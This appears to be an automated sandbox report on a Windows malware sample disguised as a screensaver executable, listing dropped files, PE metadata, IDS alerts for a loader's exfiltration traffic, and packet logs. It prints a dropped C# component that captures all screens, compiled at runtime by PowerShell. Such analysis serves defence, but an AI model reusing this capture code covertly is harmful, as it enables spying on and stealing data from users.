SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rclviame.ank.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpg5r4x5.ztf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taz2xs5r.f43.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucbjvdr1.jdn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umcknxo3.uph.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ur3qxbib.jfl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xen0z0ng.030.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzrfgrgf.hm5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1025177477737977
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyHak7Ynqq5QPN5Dlq5J:+RI+ycuZhNYHakS5QPNnqX
MD5:	534D9872A18FC984492136CBBA33107D
SHA1:	6E40341E4AFF4020D06CE4CE53B984A004258CEA
SHA-256:	0806E28A5CC875BB521F72D627BB1FB79107856314270E7BA8E2894F7A9227FE
SHA-512:	3847B8A139F7AA311823A6005E4F421A5E6F4F39A36E464E6AF15A5347578DBD7E49106C497BF69A25EAF649331566D5564155232365C8919FB9AB5BA27A6FCE
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.u.x.q.e.u.o.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.u.x.q.e.u.o.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
Category:	dropped
Size (bytes):	609
Entropy (8bit):	5.341114417844032
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikqCH1WZE2CHw:V3ka6KOkqeFkqC6E2CQ
MD5:	6898FC326023442676AB42EB04FC87EC
SHA1:	94E97A662A66D79825E45C5D5694347D1376B87D
SHA-256:	6D24E48E7E6794EFC5942E5D685043980B1087D366C9AF64614F33FF472F4142
SHA-512:	4D3949F172D7D696557E8CF51B6D1230A268A2B459DB2BE7FB4E9B6054BD898B6CDC3CE40892EB4BBB87C8A1BBA3FA19940889069F2D7E195CDEBD338B04C594
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.0.cs"

C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1591920905661808
Encrypted:	false
SSDEEP:	48:6Za7oEAtf0KhzBU/Mf6mtJnN0mcpW1ul2a3Cq:kNz0jmvOFoK
MD5:	E069FDF304E8B7C2D9AA9475290D6483
SHA1:	519DE564D3FAA9FA6D1B168F1BC617ED97B11342
SHA-256:	84EFF732B4BC159437537D26EE00F4CF054BD2FFF788A098B71E4DBD9A858B9C
SHA-512:	A89FE9D5F38F0FAD13A66DFAED06E8454DED8D4114B603E095DCD2EC48258DA31C30CDB1F225F7F7979E09B7CADB3B38E17920142EF2E8D9A7E0D6314F62B8D7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1151
Entropy (8bit):	5.50803370443689
Encrypted:	false
SSDEEP:	24:KLfRId3ka6KOkqeFkqC6E2CFKax5DqBVKVrdFAMBJTH:2fRkka6NkqeFkqC6E2CFK2DcVKdBJj
MD5:	FE8D26AC51A41FE5617A8A776067B773
SHA1:	0541851E14807CAC8F7B62D582DFAB6D5BCFF4D4
SHA-256:	D612240B5B16AD6C1E0D7C39868D23575862E9E58CADE0B01F1B6FFA263374A1
SHA-512:	46B8E395141DC3179E2BFBC084127ECEDC9291BA6D761CF4BA68D0715B6B27C43A6AC112638A5D049704AD9707B4455B0B352514EA7992AEBB10143DA7DB3D63
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lon

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.994157894224668
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	#U202f#U202f#U2005#U00a0.scr.exe
File size:	8'505'922 bytes
MD5:	d87b402b821fa842d89283aa8654d9c0
SHA1:	30c086651e1bcd191163c01efbab55f51ec04691
SHA256:	791a66abbd58ac34dc72565455fb6e596bb14b93aa5b0109e0d53c60b87b5678
SHA512:	37ff5b178e10c2a64ca5cd3c11b2dd8ac153de7b62f363f2a0b608590befa07bc4e8f35a2ab7e57fb2b9ec06e2a91dfad99ce024cc787a777b410f5e0ad81de8
SSDEEP:	196608:WoeEzryqpLjv+bhqNVoB8Ck5c7GpNlpq41J2jnFHbk9qtlDfJP:EWyKL+9qz88Ck+7q3p91Jin8qfZ
TLSH:	7B86336873100CF1DA6AA23DCA12856CDBB3BE622765C5DB0368A3365F178D48C3BF55
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14000c1f0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x65833292 [Wed Dec 20 18:29:38 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	1af6c885af093afc55142c2f1761dbe8

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/09/2021 02:00:00 29/09/2024 01:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F6B0510C07Ch
dec eax
add esp, 28h
jmp 00007F6B0510BC8Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F6B0510C5F4h
test eax, eax
je 00007F6B0510BE33h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F6B0510BE17h
dec eax
cmp ecx, eax
je 00007F6B0510BE26h
xor eax, eax
dec eax
cmpxchg dword ptr [0003427Ch], ecx
jne 00007F6B0510BE00h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F6B0510BE09h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
movzx eax, byte ptr [00034267h]
test ecx, ecx
mov ebx, 00000001h
cmove eax, ebx
mov byte ptr [00034257h], al
call 00007F6B0510C3F3h
call 00007F6B0510D512h
test al, al
jne 00007F6B0510BE16h
xor al, al
jmp 00007F6B0510BE26h
call 00007F6B0511A4B1h
test al, al
jne 00007F6B0510BE1Bh
xor ecx, ecx
call 00007F6B0510D522h
jmp 00007F6B0510BDFCh
mov al, bl
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003421Ch], 00000000h
mov ebx, ecx
jne 00007F6B0510BE79h
cmp ecx, 01h
jnbe 00007F6B0510BE7Ch
call 00007F6B0510C55Ah
test eax, eax
je 00007F6B0510BE3Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3cdcc	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0x924	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x42000	0x22a4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x81a5fa	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x47000	0x75c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a330	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3a1f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x420	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29c90	0x29e00	62616acf257019688180f494b4eb78d4	False	0.5523087686567164	data	6.4831047330596565	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12bf4	0x12c00	7aa3d5eab610b40e57242dc83c401270	False	0.5184765625	data	5.835065642995783	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x3338	0xe00	99d84572872f2ce8d9bdbc2521e1966e	False	0.1328125	Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 0	1.8271683819747706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x42000	0x22a4	0x2400	39f0a7d8241a665fc55289b5f9977819	False	0.4720052083333333	data	5.316391891279308	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x45000	0x15c	0x200	624222957a635749731104f8cdf6f9b7	False	0.38671875	data	2.83326547900447	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x46000	0x924	0xa00	cd17ad3571acb68f6e691815ac5f5a72	False	0.4203125	data	5.142657713443727	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x47000	0x75c	0x800	4138d4447f190c2657ec208ef31be551	False	0.5458984375	data	5.240127521097618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x460a0	0x374	data			0.45361990950226244
RT_MANIFEST	0x46414	0x50d	XML 1.0 document, ASCII text			0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-04T02:22:28.590934+0200	TCP	2857752	ETPRO MALWARE SynthIndi Loader CnC Response	443	57967	149.154.167.220	192.168.2.5
2024-08-04T02:22:27.754644+0200	TCP	2857751	ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)	57967	443	192.168.2.5	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 4, 2024 02:22:26.415791988 CEST	57966	80	192.168.2.5	208.95.112.1
Aug 4, 2024 02:22:26.420733929 CEST	80	57966	208.95.112.1	192.168.2.5
Aug 4, 2024 02:22:26.420854092 CEST	57966	80	192.168.2.5	208.95.112.1
Aug 4, 2024 02:22:26.420926094 CEST	57966	80	192.168.2.5	208.95.112.1
Aug 4, 2024 02:22:26.425786972 CEST	80	57966	208.95.112.1	192.168.2.5
Aug 4, 2024 02:22:26.894061089 CEST	80	57966	208.95.112.1	192.168.2.5
Aug 4, 2024 02:22:27.064843893 CEST	57966	80	192.168.2.5	208.95.112.1
Aug 4, 2024 02:22:27.110645056 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.110743999 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.110836983 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.134610891 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.134670973 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.749912024 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.750406981 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.750423908 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.752396107 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.752461910 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.753783941 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.753866911 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.754050970 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754137039 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754152060 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.754333973 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754354954 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.754472017 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754580975 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.754703045 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754719973 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.754736900 CEST	57967	443	192.168.2.5	149.154.167.220
